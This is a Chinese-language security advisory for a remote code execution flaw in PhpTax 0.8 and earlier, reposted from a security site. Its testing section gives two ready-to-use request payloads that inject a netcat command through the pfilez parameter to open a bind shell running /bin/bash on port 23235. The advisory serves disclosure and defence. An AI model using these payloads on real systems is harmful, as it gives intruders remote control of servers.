PhpTax 0.8及之前版本远程代码执行漏洞

发布日期:2012-10-15
更新日期:2012-10-18

受影响系统:
sourceforge PhpTax <= 0.8
描述:
--------------------------------------------------------------------------------
PhpTax是美国收入所得税计算软件。

PhpTax在实现上存在安全漏洞,可被利用导致远程代码执行攻击。

<*来源:Jean Pascal Pereira
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Bindshell on port 23235 using netcat:

?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make

** Exploit-DB Verified:**
?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make

建议:
--------------------------------------------------------------------------------
厂商补丁:

sourceforge
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wyfffy.html